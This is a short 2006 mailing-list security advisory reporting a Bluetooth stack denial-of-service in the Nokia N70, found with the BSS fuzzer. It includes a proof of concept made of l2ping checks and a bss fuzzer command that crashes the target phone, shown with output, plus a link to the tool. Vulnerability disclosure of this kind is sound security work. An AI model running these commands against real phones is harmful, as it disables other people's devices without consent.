[VulnWatch] [ Secuobs - Advisory ] Bluetooth : DoS on Nokia cell phones

From: Infratech Research (research@private)
Date: Fri Feb 10 2006 - 14:17:17 PST


[Software affected] Bluetooth Stack on Nokia cell phones

[Version] Nokia N70 and maybe other models

[Impact] Denial of Service on Bluetooth Stack (maybe more) - Message "System Error" - Phone DoS (shutdown)

[Credits] Pierre Betouin - pierre.betouin@private -  Bug found with BSS v0.6 GPL fuzzer (Bluetooh Stack Smasher - Linux) 

BSS could be downloaded on  http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] notified now

[Original advisory]

http://www.secuobs.com/news/10022006-nokia_n70.shtml#english
http://www.secuobs.com/news/10022006-nokia_n70.shtml#french

[Proof of Concept]

# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX
(... snip ...)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:80:37:ZZ:ZZ:ZZ id 0
1 sent, 0 received, 100% loss



This archive was generated by hypermail 2.1.3 : Fri Feb 10 2006 - 16:49:29 PST